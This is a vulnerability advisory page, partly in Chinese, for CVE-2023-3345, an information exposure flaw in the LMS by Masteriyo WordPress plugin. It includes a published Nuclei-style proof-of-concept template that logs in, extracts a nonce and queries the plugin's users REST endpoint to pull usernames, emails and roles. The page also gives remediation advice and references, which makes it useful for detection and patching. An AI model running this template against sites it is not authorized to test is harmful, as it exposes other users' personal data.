CVE-2023-3345: LMS by Masteriyo < 1.6.8 - Information Exposure

日期: 2025-08-01 | 影响软件: LMS by Masteriyo | POC: 已公开

漏洞描述

The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.

PoC代码[已公开]

id: CVE-2023-3345

info:
  name: LMS by Masteriyo < 1.6.8 - Information Exposure
  author: DhiyaneshDK
  severity: medium
  description: |
    The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.
  impact: |
    An attacker can gain unauthorized access to sensitive information.
  remediation: |
    Upgrade LMS by Masteriyo to version 1.6.8 or higher to fix the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/0d07423e-98d2-43a3-824d-562747a3d65a
    - https://github.com/RandomRobbieBF/learning-management-system
    - https://wordpress.org/plugins/learning-management-system
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3345
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-3345
    cwe-id: CWE-200
    epss-score: 0.64843
    epss-percentile: 0.98381
    cpe: cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: masteriyo
    product: masteriyo
    framework: wordpress
  tags: cve2023,cve,wp-plugin,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/profile.php HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-json/masteriyo/v1/users/ HTTP/1.1
        Host: {{Hostname}}
        X-WP-Nonce: {{nonce}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '"username":'
          - '"email":'
          - '"roles":'
        condition: and

      - type: word
        part: header_3
        words:
          - application/json

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - '"nonce":"([a-z0-9]+)","versionString'
        internal: true
# digest: 4a0a0047304502201fd3a8114851bf560d8a953711077a01594db81ab6cb3734ad4dbd8c62099e48022100ce17a3640ddf0fbb9d09f316cb3411765029ab410afa581af3cfcdb4a92b9809:922c64590222798bb761d5b6d8e72950

相关漏洞推荐